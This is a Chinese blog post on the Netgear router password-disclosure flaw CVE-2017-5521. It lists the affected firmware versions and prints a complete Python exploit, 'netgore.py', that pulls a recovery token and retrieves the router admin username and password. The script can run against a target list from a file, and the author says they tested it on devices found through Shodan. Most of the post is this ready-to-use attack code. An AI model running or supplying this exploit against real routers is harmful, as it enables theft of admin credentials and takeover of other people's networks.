SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token。然后通过passwordrecovered.cgi?id=TOKEN获取到路由器管理员密码。

漏洞细节

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911

漏洞影响范围:

Finding 1: Remote and Local Password Disclosure

Credit: Simon Kenin of Trustwave SpiderLabs

CVE: CVE-2017-5521

Version affected: 

# AC1450 V1.0.0.34_10.0.16 (Latest)

# AC1450 V1.0.0.22_1.0.10

# AC1450 V1.0.0.14_1.0.6

# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)

# D6400 V1.0.0.34_1.3.34

# D6400 V1.0.0.38_1.1.38

# D6400 V1.0.0.22_1.0.22

# DC112A V1.0.0.30_1.0.60 (Latest)

# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)

# JNDR3000 V1.0.0.18_1.0.16 (Latest)

# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)

# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)

# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)

# R6300	V1.0.2.78_1.0.58 (Latest)

# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)

# R6300v2 V1.0.3.30_10.0.73

# R6700 V1.0.1.14_10.0.29 (Latest beta)

# R6700 V1.0.0.26_10.0.26 (Latest stable)

# R6700 V1.0.0.24_10.0.18

# R6900 V1.0.0.4_1.0.10 (Latest)

# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)

# R8300 V1.0.2.48_1.0.52

# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)

# R8500 V1.0.2.26_1.0.41

# R8500 V1.0.0.56_1.0.28

# R8500 V1.0.0.20_1.0.11

# VEGN2610 V1.0.0.35_1.0.35 (Latest)

# VEGN2610 V1.0.0.29_1.0.29

# VEGN2610 V1.0.0.27_1.0.27

# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)

# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)

# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)

# WNDR4000 V1.0.2.4_9.1.86 (Latest)

# WNDR4500 V1.0.1.40_1.0.68 (Latest)

# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)

# WNDR4500v2 V1.0.0.42_1.0.25

# WGR614v10 V1.0.2.60_60.0.85NA (Latest)

# WGR614v10 V1.0.2.58_60.0.84NA

# WGR614v10 V1.0.2.54_60.0.82NA

# WN3100RP V1.0.0.14_1.0.19 (Latest)

# WN3100RP V1.0.0.6_1.0.12

# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)

# Lenovo R3220 V1.0.0.13_1.0.13

Finding 2: Remote and Local Password Disclosure

Credit: Simon Kenin of Trustwave SpiderLabs

CVE: CVE-2017-5521

Version affected:  

# AC1450 V1.0.0.34_10.0.16 (Latest)

# AC1450 V1.0.0.22_1.0.10

# AC1450 V1.0.0.14_1.0.6

# D6300 V1.0.0.96_1.1.96 (Latest)

# D6300B V1.0.0.36_1.0.36

# D6300B V1.0.0.32_1.0.32

# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)

# D6400 V1.0.0.22_1.0.22

# DC112A V1.0.0.30_1.0.60 (Latest)

# DGN2200v4 V1.0.0.76_1.0.76 (Latest)

# DGN2200v4 V1.0.0.66_1.0.66

# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)

# JNDR3000 V1.0.0.18_1.0.16 (Latest)

# R6200 V1.0.1.56_1.0.43 (Latest)

# R6200 V1.0.1.52_1.0.41

# R6200 V1.0.1.48_1.0.37

# R6200v2 V1.0.3.10_10.1.10 (Latest)

# R6200v2 V1.0.1.20_1.0.18

# R6250 V1.0.4.6_10.1.12 (Latest beta)

# R6250 V1.0.4.2_10.1.10 (Latest stable)

# R6250 V1.0.1.84_1.0.78

# R6300	V1.0.2.78_1.0.58 (Latest)

# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)

# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)

# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)

# R6700 V1.0.0.26_10.0.26 (Latest)

# R6700 V1.0.0.24_10.0.18

# R6900 V1.0.0.4_1.0.10 (Latest)

# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)

# R7000 V1.0.4.30_1.1.67

# R7900 V1.0.1.8_10.0.14 (Latest beta)

# R7900 V1.0.1.4_10.0.12 (Latest stable)

# R7900 V1.0.0.10_10.0.7

# R7900 V1.0.0.8_10.0.5

# R7900 V1.0.0.6_10.0.4

# R8000 V1.0.3.26_1.1.18 (Latest beta)

# R8000 V1.0.3.4_1.1.2 (Latest stable)

# R8300 V1.0.2.48_1.0.52

# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)

# R8500 V1.0.2.30_1.0.43

# VEGN2610 V1.0.0.35_1.0.35 (Latest)

# VEGN2610 V1.0.0.27_1.0.27

# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)

# VEVG2660 V1.0.0.23_1.0.23

# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)

# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)

# WNDR3400v3 V1.0.1.2_1.0.51

# WNDR3400v3 V1.0.0.22_1.0.29

# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)

# WNDR4000 V1.0.2.4_9.1.86 (Latest)

# WNDR4500 V1.0.1.40_1.0.68 (Latest)

# WNDR4500 V1.0.1.6_1.0.24

# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)

# WNDR4500v2 V1.0.0.50_1.0.30

# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)

# WNR1000v3 V1.0.2.62_60.0.87 (Latest)

# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)

# WNR3500Lv2 V1.2.0.32_40.0.74

# WGR614v10 V1.0.2.60_60.0.85NA (Latest)

# WGR614v10 V1.0.2.58_60.0.84NA

# WGR614v10 V1.0.2.54_60.0.82NA

# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)

# Lenovo R3220 V1.0.0.13_1.0.13

Netgear漏洞利用exploit:

## netgore.py

import sys

import requests

def scrape(text, start_trig, end_trig):

    if text.find(start_trig) != -1:

	return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]

    else:

        return "i_dont_speak_english"

def exp1(ip,port):

    #disable nasty insecure ssl warning

    requests.packages.urllib3.disable_warnings()

    #1st stage - get token

    # ip = sys.argv[1]

    # port = sys.argv[2]

    url = 'http://' + ip + ':' + port + '/'

    try:

        r = requests.get(url)

    except:

        url = 'https://' + ip + ':' + port + '/'

        r = requests.get(url, verify=False)

    model = r.headers.get('WWW-Authenticate')

    if model is not None:

        print "Attcking: " + model[13:-1]

    else:

        print "not a netgear router"

        #sys.exit(0)

    token = scrape(r.text, 'unauth.cgi?id=', '\"')

    if token == 'i_dont_speak_english':

        print "not vulnerable"

        #sys.exit(0)

        return

    print "token found: " + token

    #2nd stage - pass the token - get the password

    url = url + 'passwordrecovered.cgi?id=' + token

    r = requests.post(url, verify=False)

    #profit

    if r.text.find('left\">') != -1:

        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))

        username = scrape(username, '>', '\'')

        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))

        password = scrape(password, '>', '\'')

        if username == "i_dont_speak_english":

            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))

            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))

    else:

        print "not vulnerable becuse password recovery IS set"

        # sys.exit(0)

        return

    #html encoding pops out of nowhere, lets replace that

    password = password.replace("#","#")

    password = password.replace("&","&")

    print "user: " + username

    print "pass: " + password

def exp2(ip,port):

    #disable nasty insecure ssl warning

    requests.packages.urllib3.disable_warnings()

    #1st stage

    # ip = sys.argv[1]

    # port = sys.argv[2]

    url = 'http://' + ip + ':' + port + '/'

    try:

        r = requests.get(url)

    except:

        url = 'https://' + ip + ':' + port + '/'

        r = requests.get(url, verify=False)

    model = r.headers.get('WWW-Authenticate')

    if model is not None:

        print "Attcking: " + model[13:-1]

    else:

        print "not a netgear router"

        #sys.exit(0)

        return

    #2nd stage

    url = url + 'passwordrecovered.cgi?id=get_rekt'

    try:

        r = requests.post(url, verify=False)

    except:

        print "not vulnerable router"

        #sys.exit(0)

    #profit

    if r.text.find('left\">') != -1:

        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))

        username = scrape(username, '>', '\'')

        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))

        password = scrape(password, '>', '\'')

        if username == "i_dont_speak_english":

            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))

            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))

    else:

        print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"

        return

        # sys.exit(0)

    #html encoding pops out of nowhere, lets replace that

    password = password.replace("#","#")

    password = password.replace("&","&")

    print "user: " + username

    print "pass: " + password

if __name__ == "__main__":

    if len(sys.argv) > 1:

        ip = sys.argv[1]

        port = sys.argv[2]

        print '---------start------------'

        print 'target',ip,port

        print '---------exp1------------'

        exp1(ip,port)

        print '---------exp2------------'

        exp2(ip,port)

    else:

        f = open('target.txt')

        for line in f:

            line = line.strip()

            l = line.split(' ')

            if len(l) > 1:

                #print l

                ip = l[0]

                port = l[2]

                print '---------start------------'

                print 'target',ip,port

                print '---------exp1------------'

                exp1(ip,port)

                print '---------exp2------------'

                exp2(ip,port)

        f.close()

  

 

shodan搜索后测试了几个netgear设备,这个漏洞很清真:

最新文章

  1. Microservice Anti-patterns
  2. webapi文档描述-swagger
  3. Android签名机制:生成keystore、签名、查看签名信息
  4. iOS LaunchScreen启动图设置
  5. java.lang.UnsupportedClassVersionError(java项目版本一致问题)
  6. GCC -Wall
  7. oracle存储过程学习---包的概念
  8. 基于dubbo的SSM(Spring,SpringMvc,Mybatis)整合的Maven多工程(下)
  9. invalid context 0x0.
  10. 11.5vue(5)完结
  11. python之virtualenv
  12. 如何用ajax下载文件
  13. 学 Win32 汇编[34] - 宏汇编(1)
  14. Vue 常见问题汇总
  15. jquery作业 教授答案
  16. 如何做windows server 2008 R2 的磁盘清理
  17. django中的缓存
  18. Laravel发送邮件配置-问题解决
  19. python(七):元类与抽象基类
  20. 【刷题】BZOJ 4259 残缺的字符串

热门文章

  1. windows中vim以及cmder的使用
  2. 「日常训练」 神、上帝以及老天爷 (HDU 2048)
  3. Linux下的调试工具
  4. 第十篇 Python的字符串格式化
  5. python 基础篇 06 编码 以及小知识点补充
  6. python 基础篇 04(列表 元组 常规操作)
  7. UVa 294 - Divisors 解题报告 c语言实现 素数筛法
  8. PHP Warning: File upload error - unable to create a temporary file in Unknown on line 0
  9. lintcode-113-删除排序链表中的重复数字 II
  10. 《学习OpenCV》课后习题解答9